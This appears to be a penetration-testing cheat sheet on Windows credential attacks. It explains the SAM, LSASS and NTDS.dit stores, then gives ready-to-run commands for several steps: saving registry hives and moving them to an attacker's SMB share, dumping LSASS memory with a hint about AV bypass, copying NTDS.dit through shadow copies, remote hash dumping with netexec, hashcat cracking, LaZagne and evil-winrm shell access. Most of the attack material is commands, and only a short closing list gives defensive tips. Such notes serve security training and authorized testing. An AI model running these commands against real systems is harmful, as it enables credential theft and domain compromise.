Windows Local Password Attacks

Credential Storage Mechanisms

Security Account Manager (SAM) Database

• Purpose: Stores local account password hashes on standalone Windows systems

• Location: Registry hives: hklm\sam, hklm\system, hklm\security

• Scope: Local user accounts on individual Windows machines

• Functionality:

  • Stores password hashes for local user accounts

  • Allows offline extraction and cracking of password hashes

  • Primary credential store for non-domain-joined computers

Local Security Authority Subsystem Service (LSASS)

• Purpose: Central credential management process in Windows

• Location: lsass.exe in Windows system processes

• Functionality:

  • Caches credentials locally in memory

  • Creates and manages access tokens

  • Handles authentication processes

  • Stores credentials for:

    • Currently logged-in users

    • Cached domain credentials

    • Service account credentials

• Security Implications:

  • Primary target for credential dumping attacks

  • Stores credentials in memory in various formats

  • Can retain credentials even after user logout

NT Directory Services (NTDS.dit)

• Purpose: Primary database for Active Directory domain controllers

• Location: %SystemRoot%\NTDS\NTDS.dit

• Scope: Enterprise-wide credential storage in Windows domain environments

• Functionality:

  • Stores user account information for entire Windows domain

  • Contains:

    • User account credentials

    • Group Policy information

    • Domain controller configuration

    • Replication metadata

  • Centralized authentication mechanism for domain-joined computers

  • Enables domain-wide login and access control

• Key Characteristics:

  • Encrypted at rest

  • Requires specific extraction techniques

  • Contains more comprehensive user information compared to SAM database

SAM Database Attack Methodology

Registry Hive Extraction

• Requires Administrative Privileges

• Extracts critical registry hives containing password hashes

• Command to Save Hives:

  Copy

  reg.exe save hklm\sam C:\sam.save
  reg.exe save hklm\system C:\system.save
  reg.exe save hklm\security C:\security.save

Transferring Hives to Attack Host

1. Set Up SMB Server:

   Copy

   sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /path/to/save

2. Move Hive Files:

   Copy

   move sam.save \\<ATTACKER_IP>\CompData
   move system.save \\<ATTACKER_IP>\CompData
   move security.save \\<ATTACKER_IP>\CompData

Hash Extraction with Impacket

• Uses Impacket's secretsdump.py to extract password hashes

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

LSASS Memory Dumping Methods

Method 1: Memory Dump Creation with Task Manager (GUI)

1. Task Manager Method (GUI)

   • Steps:

     1. Open Task Manager.

     2. Go to the Processes tab.

     3. Find and right-click lsass.exe.

     4. Select Create dump file.

   • File Location: C:\Users\<loggedonuser>\AppData\Local\Temp\lsass.DMP

   • Transfer: Use file transfer methods (e.g., discussed in Attacking SAM).

Method 2: Memory Dump Creation with Rundll32.exe & Comsvcs.dll (CLI)

• Retrieve lsass.exe PID with :

  • Command Prompt:

    Copy

    tasklist /svc | findstr lsass

  • PowerShell:

    Copy

    Get-Process lsass

• Use rundll32.exe with comsvcs.dll to create memory dump

rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dmp full

• Note:

  • Flagged by most modern AV tools.

  • AV bypass techniques may be required.

Credential Extraction

• Uses Pypykatz to parse and extract credentials from memory dump

pypykatz lsa minidump /path/to/lsass.dmp

Active Directory (NTDS.dit) Attacks

Dictionary Attack

• Attempts authentication using a list of potential passwords

netexec smb <DC_IP> -u <username> -p <password_list>

NTDS.dit Capture Methods

1. Volume Shadow Copy:

   Copy

   vssadmin create shadow /For=C:
   cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\NTDS\NTDS.dit
   cmd.exe /c move C:\NTDS\NTDS.dit \\<attack_host_IP>\<share_name>

2. CrackMapExec Method:

   Copy

   netexec smb <DC_IP> -u <username> -p <password> --ntds

Cracking Hashes with Hashcat

1. Prepare Hash File (hashestocrack.txt):

   Copy

   64f12cddaa88057e06a81b54e73b949b
   31d6cfe0d16ae931b73c59d7e0c089c0

2. Crack Hashes:

   Copy

   sudo hashcat -m 1000 hashestocrack.txt /usr/share/wordlists/rockyou.txt

Credential Hunting Commands

Lazagne Credential Extraction

• Comprehensive tool for extracting credentials from various applications

lazagne.exe all
# Verbose mode
lazagne.exe all -vv

Findstr Credential Search

• Searches files for potential credential-related strings

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

Key Terms for Credential Discovery

• Generic: password, passphrase, keys, username, creds, users, pwd, login, credentials

• Application-specific: configuration, dbcredential, dbpassword, passkeys, passphrases

Remote Authentication Attacks

CrackMapExec Remote Attacks

• Dump LSA Secrets:

  Copy

  netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --lsa

• Dump SAM Remotely:

  Copy

  netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --sam

• Dump NTDS Remotely:

  Copy

  netexec smb <TARGET_IP> --local-auth -u <USER> -p <PASSWORD> --ntds

Post-Compromise Enumeration

Local Group Membership

net localgroup

User Privileges

net user <username>

Remote Shell Access

evil-winrm -i <DC_IP> -u <username> -p <password>

Key Considerations

• Requires administrative or elevated privileges

• Most techniques are detectable by modern antivirus

• Potential to trigger security alerts

• Ethical use limited to authorized penetration testing

Defensive Recommendations

• Implement strong password policies

• Use multi-factor authentication

• Regularly update and patch systems

• Monitor and log authentication events